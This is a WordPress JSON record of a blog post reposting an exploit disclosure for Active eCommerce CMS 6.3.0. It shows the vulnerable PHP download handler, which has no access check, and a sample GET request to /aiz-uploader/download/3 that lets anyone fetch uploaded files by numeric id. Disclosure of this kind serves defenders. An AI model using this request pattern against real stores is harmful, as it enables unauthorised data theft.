{"id":31116,"date":"2022-09-26T21:48:35","date_gmt":"2022-09-26T18:48:35","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168489\/activeecomcms630-disclose.txt"},"modified":"2022-09-28T15:10:10","modified_gmt":"2022-09-28T11:40:10","slug":"active-ecommerce-cms-6-3-0-arbitrary-file-download","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/active-ecommerce-cms-6-3-0-arbitrary-file-download\/","title":{"rendered":"Active eCommerce CMS 6.3.0 Arbitrary File Download"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Active eCommerce CMS Arbitrary File Download<br \/>\n# Exploit Author: th3d1gger<br \/>\n# Vendor Homepage: https:\/\/codecanyon.net<br \/>\n# Software Link: https:\/\/codecanyon.net\/item\/active-ecommerce-cms\/23471405<br \/>\n# Version: Version 6.3.0<br \/>\n# Tested on Ubuntu 18.04<\/p>\n<p dir=\"ltr\">without authentication with for loop user can download all files on the website with numeric ids.<\/p>\n<p dir=\"ltr\">\/aiz-uploadder\/download\/{id}<\/p>\n<p dir=\"ltr\">&lt;&#8211;Vulnerable source code&#8211;&gt;<br \/>\npublic function attachment_download($id)<br \/>\n{<br \/>\n$project_attachment = Upload::find($id);<br \/>\ntry{<br \/>\n$file_path = public_path($project_attachment-&gt;file_name);<br \/>\nreturn Response::download($file_path);<br \/>\n}catch(\\Exception $e){<br \/>\nflash(translate(&#8216;File does not exist!&#8217;))-&gt;error();<br \/>\nreturn back();<br \/>\n}<\/p>\n<p dir=\"ltr\">}<\/p>\n<p dir=\"ltr\">&#8212;&#8212;-Request&#8212;&#8212;&#8212;&#8211;<\/p>\n<p dir=\"ltr\">GET \/aiz-uploader\/download\/3 HTTP\/1.1<br \/>\nHost: localhost<br \/>\nsec-ch-ua: &#8220;Chromium&#8221;;v=&#8221;103&#8243;, &#8220;.Not\/A)Brand&#8221;;v=&#8221;99&#8243;<br \/>\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9<br \/>\nUpgrade-Insecure-Requests: 1<br \/>\nsec-ch-ua-mobile: ?0<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/103.0.5060.134 Safari\/537.36<br \/>\nsec-ch-ua-platform: &#8220;Linux&#8221;<br \/>\nSec-Fetch-Site: same-origin<br \/>\nSec-Fetch-Mode: navigate<br \/>\nSec-Fetch-Dest: empty<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-US,en;q=0.9<br \/>\nCookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663797922828%7D; TawkConnectionTime=0; XSRF-TOKEN=CPX7GmsCyaC1NSvSVXt1Ukjv6BDMmcEFsFYijPYB; active_ecommerce_cms_session=zQGudzxBZLEDymY6TvM4yDEKrxTAQJ7FAVIAQEBU<br \/>\nConnection: close<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Active eCommerce CMS Arbitrary File Download # Exploit Author: th3d1gger # Vendor Homepage: https:\/\/codecanyon.net # Software Link: https:\/\/codecanyon.net\/item\/active-ecommerce-cms\/23471405 # Version: Version 6.3.0 # Tested on Ubuntu 18.04 without authentication with for loop user can download all files on the website with numeric ids. \/aiz-uploadder\/download\/{id} &lt;&#8211;Vulnerable source code&#8211;&gt; public function attachment_download($id) { $project_attachment &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-31116","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31116","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=31116"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31116\/revisions"}],"predecessor-version":[{"id":31221,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31116\/revisions\/31221"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=31116"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=31116"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=31116"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}